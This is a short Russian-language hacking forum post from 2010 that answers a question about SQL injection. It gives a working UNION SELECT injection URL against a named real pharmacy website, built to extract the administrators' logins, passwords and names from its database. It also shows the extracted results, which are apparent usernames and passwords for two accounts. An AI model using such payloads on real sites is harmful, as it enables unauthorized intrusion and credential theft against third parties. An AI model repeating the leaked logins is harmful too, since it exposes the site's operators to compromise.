10.03.2010, 19:20
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от Sharsky
Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)
Вот запрос:
Логин и пасс админа не выводит...
http://www.pharmabort.ru/page.php?id=-15 UNION SELECT 1,2,3,concat(0x7e,pharma_admins.login,0x7e,pharma_ admins.password,0x7e,pharma_admins.name,0x7e),5,6, 7,8,9,10,11,12,13,14,15+FROM+pharmabort.pharma_adm ins+LIMIT+0,1--
~mooncat~sql~netservice~
LIMIT+1,1--
~cons1~cons~Консультант
|
|
|